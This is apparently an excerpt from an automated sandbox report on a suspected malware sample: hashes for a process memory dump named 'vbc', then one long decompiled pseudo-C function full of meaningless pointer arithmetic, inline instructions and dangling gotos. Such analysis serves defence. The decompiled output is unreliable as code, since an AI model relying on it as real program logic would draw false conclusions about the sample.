                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4Oi$p_i
                                              • API String ID: 0-3649059812
                                              • Opcode ID: 02d8d4fbaf9ad223273d6807ef71aa0e2b189c3dcb550c85a3506b0a48a109e2
                                              • Instruction ID: ea71c3a12f30f13259e8b2d83fdedfea6627d37b00428d41b72fd0a6cd5e75f6
                                              • Opcode Fuzzy Hash: 02d8d4fbaf9ad223273d6807ef71aa0e2b189c3dcb550c85a3506b0a48a109e2
                                              • Instruction Fuzzy Hash: A1616A709046488FD758EF7AE945A8EBBF7ABD9304F10C539D108AB22AEF345985CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E0126BA77(signed int __eax, void* __ebx, signed char __ecx, signed char __edx, signed char __edi, signed int __esi) {
                                              				signed char _t119;
                                              				signed char* _t120;
                                              				signed char _t122;
                                              				signed char _t123;
                                              				signed char _t125;
                                              				signed char _t126;
                                              				signed char _t128;
                                              				signed char _t129;
                                              				signed int _t130;
                                              				signed int _t131;
                                              				signed int _t132;
                                              				signed int _t136;
                                              				signed char _t137;
                                              				signed char _t138;
                                              				signed char _t139;
                                              				signed char _t140;
                                              				signed char _t141;
                                              				signed int _t142;
                                              				signed char _t143;
                                              				signed char _t144;
                                              				signed char _t145;
                                              				signed int _t146;
                                              				intOrPtr* _t147;
                                              				intOrPtr* _t150;
                                              				signed char _t151;
                                              				signed char _t152;
                                              				signed char _t153;
                                              				signed char _t154;
                                              				signed char _t155;
                                              				signed int _t156;
                                              				signed char _t157;
                                              				signed char _t158;
                                              				signed char _t159;
                                              				signed char _t160;
                                              				signed char _t161;
                                              				signed char _t162;
                                              				signed char _t165;
                                              				signed char _t166;
                                              				signed char _t167;
                                              				signed char _t168;
                                              				signed char _t171;
                                              				signed char _t174;
                                              				signed char _t175;
                                              				signed char _t176;
                                              				signed char _t177;
                                              				signed char _t180;
                                              				signed char _t181;
                                              				signed char _t184;
                                              				signed char _t185;
                                              				signed char _t188;
                                              				signed char _t189;
                                              				signed char _t192;
                                              				signed char _t193;
                                              				signed char _t194;
                                              				signed int _t198;
                                              				signed char _t204;
                                              				signed char _t205;
                                              				signed char _t206;
                                              				signed char _t207;
                                              				signed char _t208;
                                              				signed char _t209;
                                              				signed char _t210;
                                              				signed char _t212;
                                              				signed char _t213;
                                              				signed char _t214;
                                              				signed char _t216;
                                              				signed char _t231;
                                              				signed char _t232;
                                              				void* _t234;
                                              				void* _t235;
                                              				void* _t236;
                                              				signed char _t237;
                                              				signed char _t238;
                                              				void* _t240;
                                              				void* _t241;
                                              				signed char _t242;
                                              				void* _t244;
                                              				void* _t245;
                                              				void* _t246;
                                              				signed char _t250;
                                              				signed char _t256;
                                              				signed char _t260;
                                              				signed char _t261;
                                              				signed int _t262;
                                              				signed int _t263;
                                              				signed char* _t264;
                                              
                                              				_t262 = __esi;
                                              				_t261 = __edi;
                                              				_t260 = __edx;
                                              				_t256 = __ecx;
                                              				_t119 = __eax |  *__eax;
                                              				_t231 = __ebx +  *((intOrPtr*)(__ebx - 0x4f));
                                              				 *_t119 =  *_t119 + _t119;
                                              				_t120 = _t119 + 0x19;
                                              				_pop(ds);
                                              				if(_t120 >= 0) {
                                              					L18:
                                              					 *_t260 =  *_t260 + _t256;
                                              					 *_t260 =  &(_t120[ *_t260]);
                                              					__eflags =  *_t260;
                                              					while(1) {
                                              						L19:
                                              						_t232 = _t231 +  *((intOrPtr*)(_t231 - 0x4f));
                                              						__eflags = _t232;
                                              						 *_t120 =  &(_t120[ *_t120]);
                                              						asm("outsd");
                                              						_t122 = _t263;
                                              						_t263 =  &(_t120[0x16]);
                                              						 *_t122 =  *_t122 + _t122;
                                              						_t123 = _t122 |  *_t122;
                                              						 *_t123 =  *_t123 + _t123;
                                              						asm("outsd");
                                              						_t125 = _t261;
                                              						_t261 = _t123 + 0x17;
                                              						 *_t125 =  *_t125 + _t125;
                                              						_t126 = _t125 |  *_t125;
                                              						_t234 = _t232 +  *((intOrPtr*)(_t232 - 0x4f)) +  *((intOrPtr*)(_t232 +  *((intOrPtr*)(_t232 - 0x4f)) - 0x4f));
                                              						 *_t126 =  *_t126 + _t126;
                                              						asm("cld");
                                              						_t128 = _t126 + 0x20 +  *((intOrPtr*)(_t126 + 0x20));
                                              						 *_t128 =  *_t128 + _t128;
                                              						_t129 = _t260;
                                              						_t260 = _t128;
                                              						 *_t129 =  *_t129 + _t129;
                                              						 *((intOrPtr*)(_t234 + 0x34)) =  *((intOrPtr*)(_t234 + 0x34)) + _t260;
                                              						 *_t129 =  *_t129 + _t129;
                                              						_t256 = _t256 |  *(_t261 + 0x35);
                                              						 *_t129 =  *_t129 + _t129;
                                              						_t130 = _t129 |  *_t129;
                                              						_t231 = _t234 +  *((intOrPtr*)(_t234 - 0x4f));
                                              						__eflags = _t231;
                                              						L21:
                                              						while(__eflags == 0) {
                                              							 *_t130 =  *_t130 + _t130;
                                              							_t130 = _t130 + 0x1b;
                                              							asm("outsd");
                                              							__eflags = _t130;
                                              							 *_t260 =  *_t260 + _t256;
                                              							 *_t260 =  *_t260 + _t130;
                                              							__eflags =  *_t260;
                                              							if( *_t260 != 0) {
                                              								goto L15;
                                              							} else {
                                              								 *_t130 =  *_t130 + _t130;
                                              								asm("outsd");
                                              								_t136 = _t130 + 0x1b;
                                              								__eflags = _t136;
                                              								while(1) {
                                              									 *_t136 =  *_t136 + _t136;
                                              									_t137 = _t136 |  *_t136;
                                              									_t231 = _t231 +  *((intOrPtr*)(_t231 - 0x5f));
                                              									 *_t137 =  *_t137 + _t137;
                                              									_t120 = _t137 + 0x17;
                                              									asm("outsd");
                                              									__eflags =  *_t120 - _t120;
                                              									 *_t260 =  *_t260 + _t256;
                                              									 *_t260 =  &(_t120[ *_t260]);
                                              									__eflags =  *_t260;
                                              									if( *_t260 != 0) {
                                              										goto L19;
                                              									}
                                              									 *_t120 =  &(_t120[ *_t120]);
                                              									_t138 =  &(_t120[0x1f]);
                                              									asm("adc [edi+0x73], ch");
                                              									 *_t138 =  *_t138 + _t138;
                                              									_t139 = _t138 |  *_t138;
                                              									_t237 = _t231 +  *((intOrPtr*)(_t231 - 0x5f));
                                              									__eflags = _t237;
                                              									while(1) {
                                              										 *_t139 =  *_t139 + _t139;
                                              										_t140 = _t139 + 0x20;
                                              										asm("movsd");
                                              										 *_t140 =  *_t140 + _t140;
                                              										 *_t256 =  *_t256 + _t237;
                                              										__eflags =  *_t256;
                                              										if(__eflags >= 0) {
                                              											goto L32;
                                              										}
                                              										L27:
                                              										 *_t140 =  *_t140 + _t140;
                                              										_t256 = _t256 |  *(_t261 + 0x32);
                                              										 *_t140 =  *_t140 + _t140;
                                              										_t216 = _t140 |  *_t140;
                                              										_t231 = _t237 +  *((intOrPtr*)(_t237 - 0x5f));
                                              										 *_t216 =  *_t216 + _t216;
                                              										_t136 = _t216 + 0x72;
                                              										asm("int 0x19");
                                              										_t41 = _t136 + 0x6f;
                                              										 *_t41 =  *(_t136 + 0x6f) + _t260;
                                              										__eflags =  *_t41;
                                              										if(__eflags < 0) {
                                              											 *_t260 =  *_t260 + _t256;
                                              											 *_t260 =  *_t260 + _t136;
                                              											__eflags =  *_t260;
                                              											if( *_t260 != 0) {
                                              												goto L31;
                                              											} else {
                                              												 *_t136 =  *_t136 + _t136;
                                              												asm("outsd");
                                              												_t142 = _t136 + 0x1b;
                                              												 *_t142 =  *_t142 + _t142;
                                              												__eflags =  *_t142;
                                              												L46:
                                              												 *_t260 =  *_t260 + _t256;
                                              												 *_t260 =  *_t260 + _t142;
                                              												__eflags =  *_t260;
                                              												if(__eflags != 0) {
                                              													if(__eflags >= 0) {
                                              														goto L41;
                                              													} else {
                                              														 *_t142 =  *_t142 + _t142;
                                              														_t256 = _t256 |  *(_t261 + 0x35);
                                              														 *_t142 =  *_t142 + _t142;
                                              														_t237 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
                                              														__eflags = _t237;
                                              														goto L36;
                                              													}
                                              												} else {
                                              													 *_t142 =  *_t142 + _t142;
                                              													_t150 = _t142 + 0x17;
                                              													asm("outsd");
                                              													__eflags =  *_t150 - _t150;
                                              													 *_t260 =  *_t260 + _t256;
                                              													 *_t260 =  *_t260 + _t150;
                                              													__eflags =  *_t260;
                                              													if( *_t260 != 0) {
                                              														L36:
                                              														_t139 =  *0x18040000;
                                              														asm("outsd");
                                              														__eflags = _t139;
                                              														 *_t260 =  *_t260 + _t256;
                                              														 *_t260 =  *_t260 + _t139;
                                              														__eflags =  *_t260;
                                              														if( *_t260 != 0) {
                                              															 *_t139 =  *_t139 + _t139;
                                              															_t140 = _t139 + 0x20;
                                              															asm("movsd");
                                              															 *_t140 =  *_t140 + _t140;
                                              															 *_t256 =  *_t256 + _t237;
                                              															__eflags =  *_t256;
                                              															if(__eflags >= 0) {
                                              																goto L32;
                                              															}
                                              														} else {
                                              															 *_t139 =  *_t139 + _t139;
                                              															_t144 = _t139 + 0x72;
                                              															__eflags = _t144;
                                              															asm("in eax, dx");
                                              															asm("sbb [eax], al");
                                              															if(_t144 < 0) {
                                              																goto L52;
                                              															} else {
                                              																__eflags = _t144 - 0xa0000;
                                              																goto L39;
                                              															}
                                              														}
                                              													} else {
                                              														 *_t150 =  *_t150 + _t150;
                                              														_t143 = _t150 + 0x20;
                                              														__eflags =  *_t143 & 0x00000000;
                                              														 *_t261 =  *_t261 + _t238;
                                              														_t51 = _t238 + 0x31;
                                              														 *_t51 =  *(_t238 + 0x31) | _t262;
                                              														__eflags =  *_t51;
                                              														 *_t143 =  *_t143 ^ _t143;
                                              														 *_t260 =  *_t260 + _t256;
                                              														asm("outsd");
                                              														_t144 = _t143 ^  *_t143;
                                              														 *_t260 =  *_t260 + _t256;
                                              														 *_t260 =  *_t260 + _t144;
                                              														__eflags =  *_t260;
                                              														if( *_t260 != 0) {
                                              															L39:
                                              															 *_t144 =  *_t144 + _t144;
                                              															_t145 = _t144 |  *_t144;
                                              															_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
                                              															 *_t145 =  *_t145 + _t145;
                                              															_t142 = _t145 + 0x17;
                                              															__eflags = _t142;
                                              															asm("outsd");
                                              															if (_t142 <= 0) goto L40;
                                              															 *_t260 =  *_t260 + _t256;
                                              															 *_t260 =  *_t260 + _t142;
                                              															__eflags =  *_t260;
                                              															L41:
                                              															_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
                                              															__eflags = _t231;
                                              														} else {
                                              															 *_t144 =  *_t144 + _t144;
                                              															_t146 = _t144 + 0x72;
                                              															__eflags = _t146;
                                              															asm("out dx, eax");
                                              															asm("sbb [eax], eax");
                                              															if(_t146 < 0) {
                                              																L64:
                                              																_t147 = _t146 + 0x17;
                                              																asm("outsd");
                                              																__eflags =  *_t147 - _t147;
                                              																 *_t260 =  *_t260 + _t256;
                                              																 *_t260 =  *_t260 + _t147;
                                              																__eflags =  *_t260;
                                              																if( *_t260 != 0) {
                                              																	 *_t147 =  *_t147 + _t147;
                                              																	_t142 = _t147 + 0x19;
                                              																	asm("outsd");
                                              																	__eflags = _t142;
                                              																	 *_t260 =  *_t260 + _t256;
                                              																	 *_t260 =  *_t260 + _t142;
                                              																	__eflags =  *_t260;
                                              																	if( *_t260 != 0) {
                                              																		goto L46;
                                              																	} else {
                                              																		 *_t142 =  *_t142 + _t142;
                                              																		__eflags =  *_t142;
                                              																		goto L56;
                                              																	}
                                              																} else {
                                              																	 *_t147 =  *_t147 + _t147;
                                              																	_t151 = _t147 + 0x1f;
                                              																	asm("adc [edi+0x73], ch");
                                              																	 *_t151 =  *_t151 + _t151;
                                              																	_t142 = _t151 |  *_t151;
                                              																	_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
                                              																	__eflags = _t231;
                                              																	L66:
                                              																	if(__eflags != 0) {
                                              																		L56:
                                              																		 *(_t260 + _t262 * 2) =  *(_t260 + _t262 * 2) + _t142;
                                              																		_t136 = _t256;
                                              																		_t256 = _t142;
                                              																		asm("sbb [eax], eax");
                                              																		_t60 = _t136 + 0x6f;
                                              																		 *_t60 =  *(_t136 + 0x6f) + _t260;
                                              																		__eflags =  *_t60;
                                              																	} else {
                                              																		 *_t142 =  *_t142 + _t142;
                                              																		_t152 = _t142 + 0x19;
                                              																		asm("sbb [ebx+0x31], esi");
                                              																		 *_t152 =  *_t152 + _t152;
                                              																		_t256 = _t256 |  *(_t261 + 0x32);
                                              																		 *_t152 =  *_t152 + _t152;
                                              																		_t153 = _t152 |  *_t152;
                                              																		_t238 = _t231 +  *((intOrPtr*)(_t231 - 0x5d));
                                              																		 *_t153 =  *_t153 + _t153;
                                              																		_t154 = _t153 + 0x72;
                                              																		asm("adc [edx], ebx");
                                              																		_t69 = _t154 + 0x6f;
                                              																		 *_t69 =  *(_t154 + 0x6f) + _t260;
                                              																		__eflags =  *_t69;
                                              																		if(__eflags < 0) {
                                              																			 *_t260 =  *_t260 + _t256;
                                              																			 *_t260 =  *_t260 + _t154;
                                              																			__eflags =  *_t260;
                                              																			if( *_t260 != 0) {
                                              																				goto L71;
                                              																			} else {
                                              																				 *_t154 =  *_t154 + _t154;
                                              																				asm("outsd");
                                              																				_t212 = _t154 + 0x1b;
                                              																				 *_t212 =  *_t212 + _t212;
                                              																				_t160 = _t212 |  *_t212;
                                              																				_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
                                              																				__eflags = _t231;
                                              																				goto L83;
                                              																			}
                                              																		} else {
                                              																			_t156 = _t154 ^  *_t154;
                                              																			 *_t260 =  *_t260 + _t256;
                                              																			 *_t260 =  *_t260 + _t156;
                                              																			__eflags =  *_t260;
                                              																			if( *_t260 != 0) {
                                              																				 *_t156 =  *_t156 + _t156;
                                              																				__eflags =  *_t156;
                                              																				_push(es);
                                              																				if( *_t156 >= 0) {
                                              																					goto L73;
                                              																				} else {
                                              																					 *_t156 =  *_t156 + _t156;
                                              																					_t256 = _t256 |  *(_t261 + 0x3c);
                                              																					 *_t156 =  *_t156 + _t156;
                                              																					_t213 = _t156 |  *_t156;
                                              																					_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
                                              																					 *_t213 =  *_t213 + _t213;
                                              																					_t154 = _t213 + 0x1a;
                                              																					__eflags = _t154;
                                              																					goto L63;
                                              																				}
                                              																			} else {
                                              																				 *_t156 =  *_t156 + _t156;
                                              																				_t214 = _t156 + 0x18;
                                              																				asm("sbb [esi], edx");
                                              																				asm("sbb [ebx+0x3a], esi");
                                              																				 *_t214 =  *_t214 + _t214;
                                              																				_t256 = _t256 |  *(_t261 + 0x3b);
                                              																				 *_t214 =  *_t214 + _t214;
                                              																				_t154 = _t214 |  *_t214;
                                              																				__eflags = _t154;
                                              																				L71:
                                              																				 *_t260 =  *_t260 + _t154;
                                              																				__eflags =  *_t260;
                                              																				if( *_t260 != 0) {
                                              																					L63:
                                              																					asm("outsd");
                                              																					_t155 = _t154 + 1;
                                              																					 *_t155 =  *_t155 + _t155;
                                              																					_t146 = _t155 |  *_t155;
                                              																					_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
                                              																					 *_t146 =  *_t146 + _t146;
                                              																					__eflags =  *_t146;
                                              																					goto L64;
                                              																				} else {
                                              																					 *_t154 =  *_t154 + _t154;
                                              																					_t156 = _t154 + 0x1f;
                                              																					_t238 = _t238 - 1;
                                              																					_pop(ds);
                                              																					asm("sbb eax, 0x3473");
                                              																					L73:
                                              																					 *_t260 =  *_t260 + _t256;
                                              																					asm("outsd");
                                              																					_t142 = _t156 ^ 0x000a0000;
                                              																					_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
                                              																					 *_t142 =  *_t142 + _t142;
                                              																					__eflags =  *_t142;
                                              																					L74:
                                              																					 *((intOrPtr*)(_t261 + _t260)) =  *((intOrPtr*)(_t261 + _t260)) + _t142;
                                              																					asm("outsd");
                                              																					__eflags = _t142;
                                              																					 *_t260 =  *_t260 + _t256;
                                              																					 *_t260 =  *_t260 + _t142;
                                              																					__eflags =  *_t260;
                                              																					if(__eflags != 0) {
                                              																						goto L66;
                                              																					} else {
                                              																						 *_t142 =  *_t142 + _t142;
                                              																						_t157 = _t142 + 0x72;
                                              																						__eflags = _t157;
                                              																						asm("aaa");
                                              																						asm("sbb [eax], eax");
                                              																						if(_t157 < 0) {
                                              																							L88:
                                              																							asm("sbb [ecx], bl");
                                              																							asm("sbb [ebx+0x3a], esi");
                                              																							 *_t157 =  *_t157 + _t157;
                                              																							 *_t157 =  *_t157 + _t157;
                                              																							_t158 = _t157 |  *_t157;
                                              																							 *_t158 =  *_t158 + _t158;
                                              																							_t159 = _t158 + 0x1f;
                                              																							_t231 = _t231 +  *((intOrPtr*)(_t231 - 0x5c)) - 1;
                                              																							ds = ss;
                                              																							asm("sbb eax, 0x3473");
                                              																							_t256 = _t256 |  *(_t261 + 0x3b) |  *(_t261 + 0x35);
                                              																							 *_t159 =  *_t159 + _t159;
                                              																							_t160 = _t159 |  *_t159;
                                              																							__eflags = _t160;
                                              																							L89:
                                              																							 *_t260 =  *_t260 + _t160;
                                              																							__eflags =  *_t260;
                                              																							if( *_t260 != 0) {
                                              																								L83:
                                              																								 *_t160 =  *_t160 + _t160;
                                              																								_t142 = _t160 + 0x17;
                                              																								asm("outsd");
                                              																								__eflags =  *_t142 - _t142;
                                              																								 *_t260 =  *_t260 + _t256;
                                              																								 *_t260 =  *_t260 + _t142;
                                              																								__eflags =  *_t260;
                                              																								if( *_t260 != 0) {
                                              																									goto L74;
                                              																								} else {
                                              																									goto L84;
                                              																								}
                                              																							} else {
                                              																								 *_t160 =  *_t160 + _t160;
                                              																								__eflags =  *_t160;
                                              																								L91:
                                              																								_t85 = _t262 + _t260;
                                              																								 *_t85 =  *(_t262 + _t260) + _t160;
                                              																								__eflags =  *_t85;
                                              																								_t142 = _t160 + 0x16;
                                              																								asm("outsd");
                                              																								__eflags = _t142;
                                              																								 *_t260 =  *_t260 + _t256;
                                              																								 *_t260 =  *_t260 + _t142;
                                              																								__eflags =  *_t260;
                                              																								if( *_t260 != 0) {
                                              																									L84:
                                              																									 *_t142 =  *_t142 + _t142;
                                              																									_t161 = _t142 + 0x1f;
                                              																									_push(_t264);
                                              																									asm("sbb [ebx+0x31], esi");
                                              																									 *_t161 =  *_t161 + _t161;
                                              																									_t256 = _t256 |  *(_t261 + 0x32);
                                              																									 *_t161 =  *_t161 + _t161;
                                              																									_t162 = _t161 |  *_t161;
                                              																									_t241 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
                                              																									 *_t162 =  *_t162 + _t162;
                                              																									_t165 = _t162 + 0x00000072 - 0x6f70001a ^  *(_t162 + 0x72 - 0x6f70001a);
                                              																									__eflags = _t165;
                                              																									goto L85;
                                              																								} else {
                                              																									 *_t142 =  *_t142 + _t142;
                                              																									_t167 = _t142 + 0x72;
                                              																									__eflags = _t167;
                                              																									asm("popad");
                                              																									asm("sbb [eax], eax");
                                              																									if(_t167 < 0) {
                                              																										L105:
                                              																										 *_t167 =  *_t167 + _t167;
                                              																										_t168 = _t167 |  *_t167;
                                              																										_t242 = _t238 +  *((intOrPtr*)(_t238 - 0x6b));
                                              																										__eflags = _t242;
                                              																									} else {
                                              																										__eflags = _t167 - 0xa0000;
                                              																										_t241 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
                                              																										 *_t167 =  *_t167 + _t167;
                                              																										_t165 = _t167 + 0x17;
                                              																										__eflags = _t165;
                                              																										_pop(ss);
                                              																										asm("outsd");
                                              																										if (__eflags <= 0) goto L96;
                                              																										 *_t260 =  *_t260 + _t256;
                                              																										 *_t260 =  *_t260 + _t165;
                                              																										__eflags =  *_t260;
                                              																										if( *_t260 != 0) {
                                              																											L85:
                                              																											 *_t165 =  *_t165 + _t165;
                                              																											_t166 = _t165 |  *_t165;
                                              																											_t231 = _t241 +  *((intOrPtr*)(_t241 - 0x5c));
                                              																											__eflags = _t231;
                                              																										} else {
                                              																											 *_t165 =  *_t165 + _t165;
                                              																											 *_t262 =  *_t262 + 1;
                                              																											_t166 = _t165 + 0x00000002 | 0x73060001;
                                              																											__eflags = _t166;
                                              																											if (_t166 > 0) goto L98;
                                              																											 *_t260 =  *_t260 + _t256;
                                              																											__eflags =  *_t260;
                                              																											asm("outsd");
                                              																											if ( *_t260 < 0) goto L99;
                                              																											 *_t260 =  *_t260 + _t256;
                                              																											 *_t260 =  *_t260 + _t166;
                                              																											__eflags =  *_t260;
                                              																											if( *_t260 != 0) {
                                              																												_t157 = _t166 + 0x18;
                                              																												__eflags = _t157;
                                              																												goto L88;
                                              																											} else {
                                              																												 *_t166 =  *_t166 + _t166;
                                              																												_t204 = _t166 + 0x6f;
                                              																												_t256 = _t256 + 1;
                                              																												 *_t204 =  *_t204 + _t204;
                                              																												_t160 = _t204 |  *_t260;
                                              																												__eflags = _t160;
                                              																												if(_t160 != 0) {
                                              																													goto L91;
                                              																												} else {
                                              																													 *_t160 =  *_t160 + _t160;
                                              																													_t205 = _t160 + 0x6f;
                                              																													_t260 = _t260 + 1;
                                              																													 *_t205 =  *_t205 + _t205;
                                              																													_t206 = _t205 |  *_t205;
                                              																													_t231 = _t241 +  *((intOrPtr*)(_t241 - 0x6b));
                                              																													 *_t206 =  *_t206 + _t206;
                                              																													__eflags =  *_t206;
                                              																													 *((intOrPtr*)(_t261 + _t260)) =  *((intOrPtr*)(_t261 + _t260)) + _t206;
                                              																													asm("outsd");
                                              																													_t160 = _t206 ^  *_t256;
                                              																													 *_t260 =  *_t260 + _t256;
                                              																													 *_t260 =  *_t260 + _t160;
                                              																													__eflags =  *_t260;
                                              																													if( *_t260 != 0) {
                                              																														goto L89;
                                              																													} else {
                                              																														 *_t160 =  *_t160 + _t160;
                                              																														_t207 = _t160 + 0x1a;
                                              																														_pop(ds);
                                              																														 *(_t231 + 0x31) =  *(_t231 + 0x31) & _t262;
                                              																														 *_t207 =  *_t207 + _t207;
                                              																														_t256 = _t256 |  *(_t261 + 0x33);
                                              																														 *_t207 =  *_t207 + _t207;
                                              																														_t208 = _t207 |  *_t207;
                                              																														 *_t208 =  *_t208 + _t208;
                                              																														_t198 = _t208 + 0x72;
                                              																														_t250 = _t231 +  *((intOrPtr*)(_t231 - 0x6b)) + 1;
                                              																														__eflags = _t250;
                                              																														asm("adc [eax], al");
                                              																														if(_t250 < 0) {
                                              																															_t174 = _t198 + 0x6f;
                                              																															__eflags = _t174;
                                              																															_push(0x730a0000);
                                              																															if (_t174 != 0) goto L112;
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															asm("outsd");
                                              																															_push(0);
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															_t245 = _t250 +  *[es:ebx-0x4d];
                                              																															 *_t174 =  *_t174 + _t174;
                                              																															__eflags =  *_t174;
                                              																															L113:
                                              																															_t108 = _t261 + _t263 * 2;
                                              																															 *_t108 =  *(_t261 + _t263 * 2) + _t174;
                                              																															__eflags =  *_t108;
                                              																															_push(0x730a0000);
                                              																															if ( *_t108 != 0) goto L114;
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															asm("outsd");
                                              																															_push(0);
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															_t246 = _t245 +  *[es:ebx-0x4d];
                                              																															 *_t174 =  *_t174 + _t174;
                                              																															_t175 = _t174 + 0x6f;
                                              																															__eflags = _t175;
                                              																															_push(0x730a0000);
                                              																															L115:
                                              																															 *_t175 =  *_t175 + _t175;
                                              																															_t260 = _t260 |  *(_t246 + 0x7a);
                                              																															 *_t175 =  *_t175 + _t175;
                                              																															__eflags =  *_t175;
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															asm("outsd");
                                              																															_push(0);
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															_t244 = _t246 +  *[es:ebx-0x4d];
                                              																															 *_t175 =  *_t175 + _t175;
                                              																															_t171 = _t175 + 0x6f;
                                              																															__eflags = _t171;
                                              																															_push(0x730a0000);
                                              																															L117:
                                              																															if (__eflags != 0) goto L118;
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															asm("outsd");
                                              																															_push(0);
                                              																															 *_t260 =  *_t260 + _t256;
                                              																															_t245 = _t244 +  *[es:ebx-0x4d];
                                              																															 *_t171 =  *_t171 + _t171;
                                              																															_t174 =  *(_t171 + 0x6f) * 0x00000000 |  *_t260;
                                              																															__eflags = _t174;
                                              																															if(_t174 != 0) {
                                              																																goto L113;
                                              																															}
                                              																															 *_t174 =  *_t174 + _t174;
                                              																															__eflags =  *_t174;
                                              																															while(1) {
                                              																																L120:
                                              																																_t176 = _t174 + 0x16;
                                              																																_pop(ss);
                                              																																asm("outsd");
                                              																																asm("insb");
                                              																																 *_t176 =  *_t176 + _t176;
                                              																																_t177 = _t176 |  *_t176;
                                              																																_t246 = _t245 +  *((intOrPtr*)(_t245 - 0x4d));
                                              																																 *_t177 =  *_t177 + _t177;
                                              																																_t175 =  *(_t177 + 0x6f) * 0x00000000 |  *_t260;
                                              																																__eflags = _t175;
                                              																																if(_t175 != 0) {
                                              																																	goto L115;
                                              																																}
                                              																																 *_t175 =  *_t175 + _t175;
                                              																																_t180 = _t175 + 0x18;
                                              																																__eflags = _t180;
                                              																																while(1) {
                                              																																	asm("sbb [esi], dl");
                                              																																	asm("outsd");
                                              																																	asm("insb");
                                              																																	 *_t180 =  *_t180 + _t180;
                                              																																	_t181 = _t180 |  *_t180;
                                              																																	_t244 = _t246 +  *((intOrPtr*)(_t246 - 0x4d));
                                              																																	 *_t181 =  *_t181 + _t181;
                                              																																	_t171 =  *(_t181 + 0x6f) * 0x00000000 |  *_t260;
                                              																																	__eflags = _t171;
                                              																																	if(__eflags != 0) {
                                              																																		goto L117;
                                              																																	}
                                              																																	 *_t171 =  *_t171 + _t171;
                                              																																	_t184 = _t171 + 0x19;
                                              																																	_push(ss);
                                              																																	asm("outsd");
                                              																																	asm("insb");
                                              																																	 *_t184 =  *_t184 + _t184;
                                              																																	_t185 = _t184 |  *_t184;
                                              																																	_t245 = _t244 +  *((intOrPtr*)(_t244 - 0x4d));
                                              																																	 *_t185 =  *_t185 + _t185;
                                              																																	_t174 =  *(_t185 + 0x6f) * 0x00000000 |  *_t260;
                                              																																	__eflags = _t174;
                                              																																	if(_t174 != 0) {
                                              																																		goto L120;
                                              																																	}
                                              																																	 *_t174 =  *_t174 + _t174;
                                              																																	_t188 = _t174 + 0x16;
                                              																																	_push(ss);
                                              																																	asm("outsd");
                                              																																	asm("insb");
                                              																																	 *_t188 =  *_t188 + _t188;
                                              																																	_t189 = _t188 |  *_t188;
                                              																																	__eflags = _t189;
                                              																																	_t246 = _t245 +  *((intOrPtr*)(_t245 - 0x4d));
                                              																																	 *_t189 =  *_t189 + _t189;
                                              																																	_t180 =  *(_t189 + 0x6f) * 0x00000000 |  *_t260;
                                              																																	__eflags = _t180;
                                              																																	if(_t180 != 0) {
                                              																																		continue;
                                              																																	}
                                              																																	 *_t180 =  *_t180 + _t180;
                                              																																	_t192 = _t180 + 0x17;
                                              																																	_push(ss);
                                              																																	asm("outsd");
                                              																																	asm("insb");
                                              																																	 *_t192 =  *_t192 + _t192;
                                              																																	_t193 = _t192 |  *_t192;
                                              																																	 *_t193 =  *_t193 + _t193;
                                              																																	_t194 = _t193 + 0x1b;
                                              																																	__eflags = _t194;
                                              																																	asm("outsd");
                                              																																	return _t194;
                                              																																	goto L127;
                                              																																}
                                              																																goto L117;
                                              																															}
                                              																															goto L115;
                                              																														} else {
                                              																															_t167 = _t198 ^  *_t198;
                                              																															__eflags = _t167;
                                              																															goto L105;
                                              																														}
                                              																													}
                                              																												}
                                              																											}
                                              																										}
                                              																									}
                                              																								}
                                              																							}
                                              																						} else {
                                              																							__eflags = _t157 - 0xa0000;
                                              																							_t240 = _t231 +  *((intOrPtr*)(_t231 - 0x5d));
                                              																							 *_t157 =  *_t157 + _t157;
                                              																							_t209 = _t157 + 0x17;
                                              																							__eflags = _t209;
                                              																							asm("outsd");
                                              																							if (_t209 <= 0) goto L77;
                                              																							 *_t260 =  *_t260 + _t256;
                                              																							__eflags =  *_t260;
                                              																							_t210 = _t209 |  *_t209;
                                              																							_t238 = _t240 +  *((intOrPtr*)(_t240 - 0x5d));
                                              																							__eflags = _t238;
                                              																						}
                                              																					}
                                              																				}
                                              																			}
                                              																		}
                                              																	}
                                              																}
                                              															} else {
                                              																_t142 = _t146 ^  *_t146;
                                              																 *_t260 =  *_t260 + _t256;
                                              																 *_t260 =  *_t260 + _t142;
                                              																__eflags =  *_t260;
                                              																if ( *_t260 != 0) goto L41;
                                              																L52:
                                              																 *0x1f040000 = _t144;
                                              															}
                                              														}
                                              													}
                                              												}
                                              											}
                                              										} else {
                                              											_t130 = _t136 ^  *_t136;
                                              											 *_t260 =  *_t260 + _t256;
                                              											 *_t260 =  *_t260 + _t130;
                                              											__eflags =  *_t260;
                                              											if(__eflags != 0) {
                                              												goto L21;
                                              											} else {
                                              												 *_t130 =  *_t130 + _t130;
                                              												_t136 = _t130 + 0x18;
                                              												asm("sbb [esi], edx");
                                              												asm("sbb [ebx+0x3a], esi");
                                              												 *_t136 =  *_t136 + _t136;
                                              												_t256 = _t256 |  *(_t261 + 0x3b);
                                              												 *_t136 =  *_t136 + _t136;
                                              												__eflags =  *_t136;
                                              												L31:
                                              												 *_t260 =  *_t260 + _t256;
                                              												 *_t260 =  *_t260 + _t136;
                                              												__eflags =  *_t260;
                                              												if (__eflags != 0) goto L24;
                                              												goto L32;
                                              											}
                                              										}
